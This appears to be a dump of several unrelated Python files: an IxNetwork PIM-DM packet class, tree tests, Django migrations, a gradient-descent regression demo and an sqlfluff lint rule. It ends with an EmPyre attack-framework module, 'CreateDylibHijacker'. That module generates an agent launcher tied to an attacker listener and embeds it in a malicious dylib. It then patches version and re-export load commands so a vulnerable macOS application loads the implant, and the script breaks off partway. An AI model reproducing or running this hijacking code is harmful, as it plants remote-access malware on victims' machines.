'UnicastAddrAddrIPv4': 'pimdmStateRefreshMessage.header.originatorAddress.unicastAddr.addrIPv4-19',
'UnicastAddrAddrIPv6': 'pimdmStateRefreshMessage.header.originatorAddress.unicastAddr.addrIPv6-20',
'HeaderR': 'pimdmStateRefreshMessage.header.r-21',
'HeaderMetricPreference': 'pimdmStateRefreshMessage.header.metricPreference-22',
'HeaderMetric': 'pimdmStateRefreshMessage.header.metric-23',
'HeaderMasklength': 'pimdmStateRefreshMessage.header.masklength-24',
'HeaderTtl': 'pimdmStateRefreshMessage.header.ttl-25',
'HeaderP': 'pimdmStateRefreshMessage.header.p-26',
'HeaderN': 'pimdmStateRefreshMessage.header.n-27',
'HeaderO': 'pimdmStateRefreshMessage.header.o-28',
'HeaderReserved': 'pimdmStateRefreshMessage.header.reserved-29',
'HeaderIntervalinSec': 'pimdmStateRefreshMessage.header.intervalinSec-30',
}
def __init__(self, parent, list_op=False):
super(PimdmStateRefresh, self).__init__(parent, list_op)
@property
def HeaderVersion(self):
"""
Display Name: Version
Default Value: 2
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderVersion']))
@property
def HeaderType(self):
"""
Display Name: Type
Default Value: 9
Value Format: decimal
Available enum values: State Refresh, 9
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderType']))
@property
def HeaderReserved(self):
"""
Display Name: Reserved
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderReserved']))
@property
def HeaderChecksum(self):
"""
Display Name: Checksum
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderChecksum']))
@property
def MulticastGroupAddressAddrFamily(self):
"""
Display Name: Addr Family
Default Value: 1
Value Format: decimal
Available enum values: IPv4, 1, IPv6, 2
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MulticastGroupAddressAddrFamily']))
@property
def MulticastGroupAddressEncodingType(self):
"""
Display Name: Encoding Type
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MulticastGroupAddressEncodingType']))
@property
def MulticastGroupAddressB(self):
"""
Display Name: B
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MulticastGroupAddressB']))
@property
def MulticastGroupAddressReserved(self):
"""
Display Name: Reserved
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MulticastGroupAddressReserved']))
@property
def MulticastGroupAddressZ(self):
"""
Display Name: Z
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MulticastGroupAddressZ']))
@property
def MulticastGroupAddressMaskLength(self):
"""
Display Name: Mask Length
Default Value: 24
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['MulticastGroupAddressMaskLength']))
@property
def GrpAddrFieldGroupMCastAddrIP4(self):
"""
Display Name: Group MCast Addr IP4
Default Value: 0.0.0.0
Value Format: iPv4
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GrpAddrFieldGroupMCastAddrIP4']))
@property
def GrpAddrFieldGroupMCastAddrIP6(self):
"""
Display Name: Group MCast Addr IP6
Default Value: 0::0
Value Format: iPv6
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GrpAddrFieldGroupMCastAddrIP6']))
@property
def SourceAddressAddrFamily(self):
"""
Display Name: Addr Family
Default Value: 1
Value Format: decimal
Available enum values: IPv4, 1, IPv6, 2
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SourceAddressAddrFamily']))
@property
def SourceAddressEncodingType(self):
"""
Display Name: Encoding Type
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SourceAddressEncodingType']))
@property
def UnicastAddrAddrIPv4(self):
"""
Display Name: Addr IPv4
Default Value: 0.0.0.0
Value Format: iPv4
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnicastAddrAddrIPv4']))
@property
def UnicastAddrAddrIPv6(self):
"""
Display Name: Addr IPv6
Default Value: 0::0
Value Format: iPv6
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnicastAddrAddrIPv6']))
@property
def OriginatorAddressAddrFamily(self):
"""
Display Name: Addr Family
Default Value: 1
Value Format: decimal
Available enum values: IPv4, 1, IPv6, 2
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['OriginatorAddressAddrFamily']))
@property
def OriginatorAddressEncodingType(self):
"""
Display Name: Encoding Type
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['OriginatorAddressEncodingType']))
@property
def UnicastAddrAddrIPv4(self):
"""
Display Name: Addr IPv4
Default Value: 0.0.0.0
Value Format: iPv4
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnicastAddrAddrIPv4']))
@property
def UnicastAddrAddrIPv6(self):
"""
Display Name: Addr IPv6
Default Value: 0::0
Value Format: iPv6
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UnicastAddrAddrIPv6']))
@property
def HeaderR(self):
"""
Display Name: R
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderR']))
@property
def HeaderMetricPreference(self):
"""
Display Name: Metric Preference
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderMetricPreference']))
@property
def HeaderMetric(self):
"""
Display Name: Metric
Default Value: 0x0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderMetric']))
@property
def HeaderMasklength(self):
"""
Display Name: Masklength
Default Value: 24
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderMasklength']))
@property
def HeaderTtl(self):
"""
Display Name: TTL
Default Value: 0x01
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderTtl']))
@property
def HeaderP(self):
"""
Display Name: P
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderP']))
@property
def HeaderN(self):
"""
Display Name: N
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderN']))
@property
def HeaderO(self):
"""
Display Name: O
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderO']))
@property
def HeaderReserved(self):
"""
Display Name: Reserved
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderReserved']))
@property
def HeaderIntervalinSec(self):
"""
Display Name: Interval(in sec)
Default Value: 0x0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HeaderIntervalinSec']))
def add(self):
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
| python |
from binary_search_tree.e_search_bst import BinarySearchTree
from binarytree import build
class TestBinarySearchTree:
def test_null_node(self):
bst = BinarySearchTree()
ans = bst.searchBST(None, 10)
assert ans is None
def test_root_node(self):
bst = BinarySearchTree()
nodes = [4]
ip = build(nodes)
ans = bst.searchBST(ip, 4)
assert ans == ip
def test_small_tree(self):
bst = BinarySearchTree()
nodes = [4, 2, 7, 1, 3]
ip = build(nodes)
ans = bst.searchBST(ip, 2)
assert ans.left.val == 1
def test_large_tree(self):
bst = BinarySearchTree()
nodes = [18, 9, 27, 6, 15, 24, 30, 3, None, 12, None, 21]
ip = build(nodes)
ans = bst.searchBST(ip, 24)
assert ans.left.val == 21
def test_fail_search(self):
bst = BinarySearchTree()
nodes = [4, 2, 7, 1, 3]
ip = build(nodes)
ans = bst.searchBST(ip, 5)
assert ans is None
| python |
# Generated by Django 4.0.3 on 2022-03-21 06:04
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('inadimplentes', '0010_alter_inquilino_status_de_pagamentos'),
]
operations = [
migrations.RemoveField(
model_name='inquilino',
name='tempo_de_inadimplencia',
),
]
| python |
'''
Linear regression:
Input   Output
0.5     5.0
0.6     5.5
0.8     6.0
1.1     6.8
1.4     7.0
...
y = f(x)
Prediction function: y = w0 + w1*x
x: input
y: output
w0 and w1: model parameters
Training the model means finding the best parameters w0 and w1 from the known x and y,
so that the relationship between input and output is described as accurately as possible.
E.g.: 5.0 = w0 + w1 * 0.5    5.5 = w0 + w1 * 0.6
Single-sample error: with the prediction y' = w0 + w1*x, the error for one sample is 1/2 (y' - y)^2.
Total sample error: the sum of all single-sample errors: 1/2 Σ(y' - y)^2
Loss function: loss = 1/2 Σ(w0 + w1*x - y)^2
The loss function is the total sample error viewed as a function of the model parameters w0 and w1.
It is a surface over (w0, w1), and training must find the pair (w0, w1) at which loss reaches its minimum.
Example: plot the gradient-descent process
1> Prepare the training set, apply a hand-written gradient-descent rule, solve for w0 and w1, and draw the regression line.
2> Plot how w0, w1 and loss change after each gradient-descent step.
3> Plot every step of the gradient descent on the 3-D loss surface.
4> Plot the gradient-descent path on a contour map.
'''
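# The gradient-descent update used below follows directly from the loss above
# (a sketch of the derivation; w0, w1, lrate, d0 and d1 are the names used in the training loop):
#   loss           = 1/2 * Σ(w0 + w1*x - y)^2
#   ∂loss/∂w0 = d0 = Σ(w0 + w1*x - y)
#   ∂loss/∂w1 = d1 = Σ((w0 + w1*x - y) * x)
#   w0 <- w0 - lrate * d0,   w1 <- w1 - lrate * d1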
import numpy as np
import matplotlib.pyplot as mp
from mpl_toolkits.mplot3d import axes3d
import warnings
warnings.filterwarnings('ignore')
train_x = np.array([0.5, 0.6, 0.8, 1.1, 1.4])
train_y = np.array([5.0, 5.5, 6.0, 6.8, 7.0])
# Implement the gradient-descent process
times = 1000  # number of iterations
lrate = 0.01  # learning rate; it should not be too large
w0, w1 = [1], [1]  # initial model parameters; record the parameters of every descent step
losses = []  # loss value of every iteration
epoches = []  # index of every iteration
for i in range(1, times + 1):
# Print how w0, w1 and loss change at every step
epoches.append(i)
loss = ((w0[-1] + w1[-1] * train_x - train_y) ** 2).sum() / 2
losses.append(loss)
print('{:4}> w0={:.6f},w1={:.6f},loss={:.6f}'.format(epoches[-1], w0[-1], w1[-1], losses[-1]))
# Each descent step needs correction terms for w0 and w1, obtained from the partial derivatives of loss with respect to w0 and w1
d0 = (w0[-1] + w1[-1] * train_x - train_y).sum()
d1 = ((w0[-1] + w1[-1] * train_x - train_y) * train_x).sum()
# Keep correcting the values of w0 and w1
w0.append(w0[-1] - lrate * d0)
w1.append(w1[-1] - lrate * d1)
print(w0[-1], w1[-1])
pred_y = w0[-1] + w1[-1] * train_x
# Plot the sample points
mp.figure('Linear Regression', facecolor='lightgray')
mp.title('Linear Regression')
mp.grid(linestyle=':')
mp.scatter(train_x, train_y, s=60, c='orangered', label='Samples', marker='o')
# Plot the regression line
mp.plot(train_x, pred_y, color='dodgerblue', label='Regression Line')
mp.legend()
# Plot how w0, w1 and loss change after each gradient-descent step.
mp.figure('BGD Params', facecolor='lightgray')
mp.title('BGD Params')
mp.tick_params(labelsize=10)
mp.subplot(311)
mp.title('w0')
mp.plot(epoches, w0[:-1], color='dodgerblue', label='w0')
mp.grid(linestyle=':')
mp.legend()
mp.subplot(312)
mp.title('w1')
mp.plot(epoches, w1[:-1], color='orangered', label='w1')
mp.grid(linestyle=':')
mp.legend()
mp.subplot(313)
mp.title('loss')
mp.plot(epoches, losses, color='yellowgreen', label='loss')
mp.grid(linestyle=':')
mp.legend()
# Plot every point of the gradient-descent process on the 3-D loss surface.
# Build the grid coordinate matrices and compute the loss at every grid point to draw the surface
grid_w0, grid_w1 = np.meshgrid(np.linspace(0, 9, 500), np.linspace(0, 3.5, 500))
grid_loss = np.zeros_like(grid_w0)
for x, y in zip(train_x, train_y):
grid_loss += ((grid_w0 + grid_w1 * x - y) ** 2) / 2
# Draw the 3-D loss-function surface
mp.figure('Loss Function', facecolor='lightgray')
ax3d = mp.gca(projection='3d')
ax3d.set_xlabel('w0')
ax3d.set_ylabel('w1')
ax3d.set_zlabel('loss')
ax3d.plot_surface(grid_w0, grid_w1, grid_loss, cmap='jet')
# Draw the 3-D gradient-descent curve
ax3d.plot(w0[:-1], w1[:-1], losses, 'o-', color='orangered', label='BGD', zorder=3)
mp.tight_layout()
# Plot the gradient-descent path on a contour map.
mp.figure('BGD Contour', facecolor='lightgray')
mp.title('BGD Contour')
mp.xlabel('w0')
mp.ylabel('w1')
mp.grid(linestyle=':')
cntr = mp.contour(grid_w0, grid_w1, grid_loss, c='black', linewidths=0.5)
mp.clabel(cntr, fmt='%.2f', inline_spacing=0.2, fontsize=8)
mp.contourf(grid_w0, grid_w1, grid_loss, cmap='jet')
mp.plot(w0[:-1], w1[:-1], c='orangered', label='BGD')
mp.legend()
# mp.show()  # Output: 4.065692318299849 2.2634176028710415
"""Implementation of Rule L020."""
import itertools
from sqlfluff.core.rules.base import BaseCrawler, LintResult
class Rule_L020(BaseCrawler):
"""Table aliases should be unique within each clause."""
def _lint_references_and_aliases(
self,
table_aliases,
value_table_function_aliases,
references,
col_aliases,
using_cols,
parent_select,
):
"""Check whether any aliases are duplicates.
NB: Subclasses of this error should override this function.
"""
# Are any of the aliases the same?
for a1, a2 in itertools.combinations(table_aliases, 2):
# Compare the strings
if a1.ref_str == a2.ref_str and a1.ref_str:
# If there are any, then the rest of the code
# won't make sense so just return here.
return [
LintResult(
# Reference the element, not the string.
anchor=a2.segment,
description=(
"Duplicate table alias {0!r}. Table "
"aliases should be unique."
).format(a2.ref_str),
)
]
return None
@staticmethod
def _has_value_table_function(table_expr, dialect):
if not dialect:
# We need the dialect to get the value table function names. If
# we don't have it, assume the clause does not have a value table
# function.
return False
for function_name in table_expr.recursive_crawl("function_name"):
if function_name.raw.lower() in dialect.sets("value_table_functions"):
return True
return False
@classmethod
def _get_aliases_from_select(cls, segment, dialect=None):
"""Gets the aliases referred to in the FROM clause.
Returns a tuple of two lists:
- Table aliases
- Value table function aliases
"""
fc = segment.get_child("from_clause")
if not fc:
# If there's no from clause then just abort.
return None, None
aliases = fc.get_eventual_aliases()
# We only want table aliases, so filter out aliases for value table
# functions.
table_aliases = []
value_table_function_aliases = []
for table_expr, alias_info in aliases:
if not cls._has_value_table_function(table_expr, dialect):
table_aliases.append(alias_info)
else:
value_table_function_aliases.append(alias_info)
return table_aliases, value_table_function_aliases
def _eval(self, segment, parent_stack, **kwargs):
"""Get References and Aliases and allow linting.
This rule covers a lot of potential cases of odd usages of
references, see the code for each of the potential cases.
Subclasses of this rule should override the
`_lint_references_and_aliases` method.
"""
if segment.is_type("select_statement"):
table_aliases, value_table_function_aliases = self._get_aliases_from_select(
segment, kwargs.get("dialect")
)
if not table_aliases and not value_table_function_aliases:
return None
# Iterate through all the references, both in the select clause and
# potentially elsewhere.
sc = segment.get_child("select_clause")
reference_buffer = list(sc.recursive_crawl("object_reference"))
# Add any wildcard references
reference_buffer += list(sc.recursive_crawl("wildcard_identifier"))
for potential_clause in (
"where_clause",
"groupby_clause",
"having_clause",
"orderby_clause",
):
clause = segment.get_child(potential_clause)
if clause:
reference_buffer += list(clause.recursive_crawl("object_reference"))
# PURGE any references which are in nested select statements
for ref in reference_buffer.copy():
ref_path = segment.path_to(ref)
# is it in a subselect? i.e. a select which isn't this one.
if any(
seg.is_type("select_statement") and seg is not segment
for seg in ref_path
):
reference_buffer.remove(ref)
# Get all column aliases
col_aliases = []
for col_seg in list(sc.recursive_crawl("alias_expression")):
for seg in col_seg.segments:
if seg.is_type("identifier"):
col_aliases.append(seg.raw)
# Get any columns referred to in a using clause, and extract anything
# from ON clauses.
using_cols = []
fc = segment.get_child("from_clause")
for join_clause in fc.recursive_crawl("join_clause"):
in_using_brackets = False
seen_using = False
for seg in join_clause.segments:
if seg.is_type("keyword") and seg.name == "USING":
seen_using = True
elif seg.is_type("join_on_condition"):
for on_seg in seg.segments:
if on_seg.is_type("expression"):
# Deal with expressions
reference_buffer += list(
seg.recursive_crawl("object_reference")
)
elif seen_using and seg.is_type("start_bracket"):
in_using_brackets = True
elif seen_using and seg.is_type("end_bracket"):
in_using_brackets = False
seen_using = False
elif in_using_brackets and seg.is_type("identifier"):
using_cols.append(seg.raw)
# Work out if we have a parent select function
parent_select = None
for seg in reversed(parent_stack):
if seg.is_type("select_statement"):
parent_select = seg
break
# Pass them all to the function that does all the work.
# NB: Subclasses of this rules should override the function below
return self._lint_references_and_aliases(
table_aliases,
value_table_function_aliases,
reference_buffer,
col_aliases,
using_cols,
parent_select,
)
return None
| python |
from django.db import models
class ExchangeRateManager(models.Manager):
def get_query_set(self):
return super(ExchangeRateManager, self).get_query_set()\
.select_related('source', 'target')
def get_rate(self, source_currency, target_currency):
return self.get(source__code=source_currency,
target__code=target_currency).rate
| python |
import base64
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'CreateDylibHijacker',
# list of one or more authors for the module
'Author': ['@patrickwardle,@xorrior'],
# more verbose multi-line description of the module
'Description': ('Configures an EmPyre dylib for use in a Dylib hijack, given the path to a legitimate dylib of a vulnerable application. The architecture of the dylib must match the target application. The configured dylib will be copied locally to the hijackerPath'),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : "",
'NeedsAdmin' : True,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : False,
# list of any references/other comments
'Comments': [
'comment',
'https://www.virusbulletin.com/virusbulletin/2015/03/dylib-hijacking-os-x'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'Arch' : {
'Description' : 'Arch: x86/x64',
'Required' : True,
'Value' : 'x86'
},
'LittleSnitch' : {
'Description' : 'Switch. Check for the LittleSnitch process, exit the staging process if it is running. Defaults to True.',
'Required' : True,
'Value' : 'True'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'LegitimateDylibPath' : {
'Description' : 'Full path to the legitimate dylib of the vulnerable application',
'Required' : True,
'Value' : ''
},
'VulnerableRPATH' : {
'Description' : 'Full path to where the hijacker should be planted. This will be the RPATH in the Hijack Scanner module.',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# the Python script itself, with the command to invoke
# for execution appended to the end. Scripts should output
# everything to the pipeline for proper parsing.
#
# the script should be stripped of comments, with a link to any
# original reference script included in the comments.
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
LittleSnitch = self.options['LittleSnitch']['Value']
arch = self.options['Arch']['Value']
launcher = self.mainMenu.stagers.generate_launcher(listenerName, userAgent=userAgent, littlesnitch=LittleSnitch)
launcher = launcher.strip('echo').strip(' | python &').strip("\"")
dylibBytes = self.mainMenu.stagers.generate_dylib(launcherCode=launcher, arch=arch, hijacker='true')
encodedDylib = base64.b64encode(dylibBytes)
dylib = self.options['LegitimateDylibPath']['Value']
vrpath = self.options['VulnerableRPATH']['Value']
script = """
from ctypes import *
def run(attackerDYLIB):
import ctypes
import io
import os
import sys
import fcntl
import shutil
import struct
import stat
LC_REQ_DYLD = 0x80000000
LC_LOAD_WEAK_DYLIB = LC_REQ_DYLD | 0x18
LC_RPATH = (0x1c | LC_REQ_DYLD)
LC_REEXPORT_DYLIB = 0x1f | LC_REQ_DYLD
(
LC_SEGMENT, LC_SYMTAB, LC_SYMSEG, LC_THREAD, LC_UNIXTHREAD, LC_LOADFVMLIB,
LC_IDFVMLIB, LC_IDENT, LC_FVMFILE, LC_PREPAGE, LC_DYSYMTAB, LC_LOAD_DYLIB,
LC_ID_DYLIB, LC_LOAD_DYLINKER, LC_ID_DYLINKER, LC_PREBOUND_DYLIB,
LC_ROUTINES, LC_SUB_FRAMEWORK, LC_SUB_UMBRELLA, LC_SUB_CLIENT,
LC_SUB_LIBRARY, LC_TWOLEVEL_HINTS, LC_PREBIND_CKSUM
) = range(0x1, 0x18)
MH_MAGIC = 0xfeedface
MH_CIGAM = 0xcefaedfe
MH_MAGIC_64 = 0xfeedfacf
MH_CIGAM_64 = 0xcffaedfe
_CPU_ARCH_ABI64 = 0x01000000
CPU_TYPE_NAMES = {
-1: 'ANY',
1: 'VAX',
6: 'MC680x0',
7: 'i386',
_CPU_ARCH_ABI64 | 7: 'x86_64',
8: 'MIPS',
10: 'MC98000',
11: 'HPPA',
12: 'ARM',
13: 'MC88000',
14: 'SPARC',
15: 'i860',
16: 'Alpha',
18: 'PowerPC',
_CPU_ARCH_ABI64 | 18: 'PowerPC64',
}
#structs that we need
class mach_header(ctypes.Structure):
_fields_ = [
("magic", ctypes.c_uint),
("cputype", ctypes.c_uint),
("cpusubtype", ctypes.c_uint),
("filetype", ctypes.c_uint),
("ncmds", ctypes.c_uint),
("sizeofcmds", ctypes.c_uint),
("flags", ctypes.c_uint)
]
class mach_header_64(ctypes.Structure):
_fields_ = mach_header._fields_ + [('reserved',ctypes.c_uint)]
class load_command(ctypes.Structure):
_fields_ = [
("cmd", ctypes.c_uint),
("cmdsize", ctypes.c_uint)
]
LC_HEADER_SIZE = 0x8
def checkPrereqs(attackerDYLIB, targetDYLIB):
if not os.path.exists(attackerDYLIB):
print 'ERROR: dylib \\'%%s\\' not found' %% (attackerDYLIB)
return False
if not os.path.exists(targetDYLIB):
print 'ERROR: dylib \\'%%s\\' not found' %% (targetDYLIB)
return False
attacker = open(attackerDYLIB)
target = open(targetDYLIB)
attackerHeader = mach_header.from_buffer_copy(attacker.read(28))
targetHeader = mach_header.from_buffer_copy(target.read(28))
if attackerHeader.cputype != targetHeader.cputype:
print 'ERROR: Architecture mismatch'
attacker.close()
target.close()
return False
return True
def findLoadCommand(fileHandle, targetLoadCommand):
MACHHEADERSZ64 = 32
MACHHEADERSZ = 28
matchedOffsets = []
#wrap
try:
header = mach_header.from_buffer_copy(fileHandle.read(MACHHEADERSZ))
if header.magic == MH_MAGIC_64:
fileHandle.seek(0, io.SEEK_SET)
header = mach_header_64.from_buffer_copy(fileHandle.read(MACHHEADERSZ64))
ncmds = header.ncmds
# Get to the load commands
current = fileHandle.tell() #save offset to load command
for cmd in range(ncmds):
offset = current
lc = load_command.from_buffer_copy(fileHandle.read(LC_HEADER_SIZE))
size = lc.cmdsize
if lc.cmd == targetLoadCommand:
matchedOffsets.append(offset)
fileHandle.seek(size - LC_HEADER_SIZE, io.SEEK_CUR)
current = fileHandle.tell()
#exceptions
except Exception, e:
#err msg
print 'EXCEPTION (finding load commands): %%s' %% e
#reset
matchedOffsets = None
return matchedOffsets
#configure version info
# 1) find/extract version info from target .dylib
# 2) find/update version info from hijacker .dylib to match target .dylib
def configureVersions(attackerDYLIB, targetDYLIB):
#wrap
try:
#dbg msg
print ' [+] parsing \\'%%s\\' to extract version info' %% (os.path.split(targetDYLIB)[1])
#open target .dylib
fileHandle = open(targetDYLIB, 'rb')
#find LC_ID_DYLIB load command
# ->and check
versionOffsets = findLoadCommand(fileHandle, LC_ID_DYLIB)
if not versionOffsets or not len(versionOffsets):
#err msg
print 'ERROR: failed to find \\'LC_ID_DYLIB\\' load command in %%s' %% (os.path.split(targetDYLIB)[1])
#bail
return False
#dbg msg
print ' found \\'LC_ID_DYLIB\\' load command at offset(s): %%s' %% (versionOffsets)
#seek to offset of LC_ID_DYLIB
fileHandle.seek(versionOffsets[0], io.SEEK_SET)
#seek to skip over LC header and timestamp
fileHandle.seek(LC_HEADER_SIZE+0x8, io.SEEK_CUR)
'''
struct dylib { union lc_str name; uint_32 timestamp; uint_32 current_version; uint_32 compatibility_version; };
'''
#extract current version
currentVersion = fileHandle.read(4)
#extract compatibility version
compatibilityVersion = fileHandle.read(4)
#dbg msg(s)
print ' extracted current version: 0x%%x' %% (struct.unpack('<L', currentVersion)[0])
print ' extracted compatibility version: 0x%%x' %% (struct.unpack('<L', compatibilityVersion)[0])
#close
fileHandle.close()
#dbg msg
print ' [+] parsing \\'%%s\\' to find version info' %% (os.path.split(attackerDYLIB)[1])
#open target .dylib
fileHandle = open(attackerDYLIB, 'rb+')
#find LC_ID_DYLIB load command
# ->and check
versionOffsets = findLoadCommand(fileHandle, LC_ID_DYLIB)
if not versionOffsets or not len(versionOffsets):
#err msg
print 'ERROR: failed to find \\'LC_ID_DYLIB\\' load command in %%s' %% (os.path.split(attackerDYLIB)[1])
#bail
return False
#dbg msg(s)
print ' found \\'LC_ID_DYLIB\\' load command at offset(s): %%s' %% (versionOffsets)
print ' [+] updating version info in %%s to match %%s' %% ((os.path.split(attackerDYLIB)[1]), (os.path.split(targetDYLIB)[1]))
#update version info
for versionOffset in versionOffsets:
#seek to offset of LC_ID_DYLIB
fileHandle.seek(versionOffset, io.SEEK_SET)
#seek to skip over LC header and timestamp
fileHandle.seek(LC_HEADER_SIZE+0x8, io.SEEK_CUR)
#dbg msg
print 'setting version info at offset %%s' %% (versionOffset)
#set current version
fileHandle.write(currentVersion)
#set compatability version
fileHandle.write(compatibilityVersion)
#close
fileHandle.close()
except Exception, e:
#err msg
print 'EXCEPTION (configuring version info): %%s' %% e
return True
#configure re-export
# ->update hijacker .dylib to re-export everything to target .dylib
def configureReExport(attackerDYLIB, targetDYLIB):
#wrap
try:
#dbg msg
print ' [+] parsing \\'%%s\\' to extract faux re-export info' %% (os.path.split(attackerDYLIB)[1])
#open attacker's .dylib
fileHandle = open(attackerDYLIB, 'rb+')
#find LC_REEXPORT_DYLIB load command
# ->and check
reExportOffsets = findLoadCommand(fileHandle, LC_REEXPORT_DYLIB)
if not reExportOffsets or not len(reExportOffsets):
#err msg
print 'ERROR: failed to find \\'LC_REEXPORT_DYLIB\\' load command in %%s' %% (os.path.split(attackerDYLIB)[1])
#bail
return False
#dbg msg
print ' found \\'LC_REEXPORT_DYLIB\\' load command at offset(s): %%s' %% (reExportOffsets)
'''
struct dylib { union lc_str name; uint_32 timestamp; uint_32 current_version; uint_32 compatibility_version; };
'''
#update re-export info
#TODO: does the current and compat version need to match? we can easily set it
for reExportOffset in reExportOffsets:
#seek to offset of LC_REEXPORT_DYLIB
fileHandle.seek(reExportOffset, io.SEEK_SET)
#seek to skip over command
fileHandle.seek(0x4, io.SEEK_CUR)
#read in size of load command
commandSize = struct.unpack('<L', fileHandle.read(4))[0]
#dbg msg
print ' extracted LC command size: 0x%%x' %% (commandSize)
#read in path offset
pathOffset = struct.unpack('<L', fileHandle.read(4))[0]
#dbg msg
print ' extracted path offset: 0x%%x' %% (pathOffset)
#seek to path offset
fileHandle.seek(reExportOffset + pathOffset, io.SEEK_SET)
#calc length of path
# it makes up rest of load command data
pathSize = commandSize - (fileHandle.tell() - reExportOffset)
#dbg msg
print ' computed path size: 0x%%x' %% (pathSize)
#read out path
data = targetDYLIB + '\\0' * (pathSize - len(targetDYLIB))
fileHandle.write(data)
#path can include NULLs so lets chop those off
#path = path.rstrip('\0')
#dbg msg(s)
#print ' extracted faux path: %%s' %% (path)
#close
fileHandle.close()
#dbg msg
print ' [+] updated embedded re-export'
#wrap
#handle exceptions
except Exception, e:
#err msg
print 'EXCEPTION (configuring re-exports): %%s' %% e
#bail
return False
return True
def configure(attackerDYLIB, targetDYLIB):
#configure version info
# ->update attacker's .dylib to match target .dylib's version info
if not configureVersions(attackerDYLIB, targetDYLIB):
#err msg
print 'ERROR: failed to configure version info'
#bail
return False
#configure re-export
# ->update attacker's .dylib to re-export everything to target .dylib
if not configureReExport(attackerDYLIB, targetDYLIB):
#err msg
print 'ERROR: failed to configure re-export'
#bail
return False
return True
#target .dylib
targetDYLIB = "%s"
vrpath = "%s"
#configured .dylib
configuredDYLIB = ""
#init output path for configured .dylib
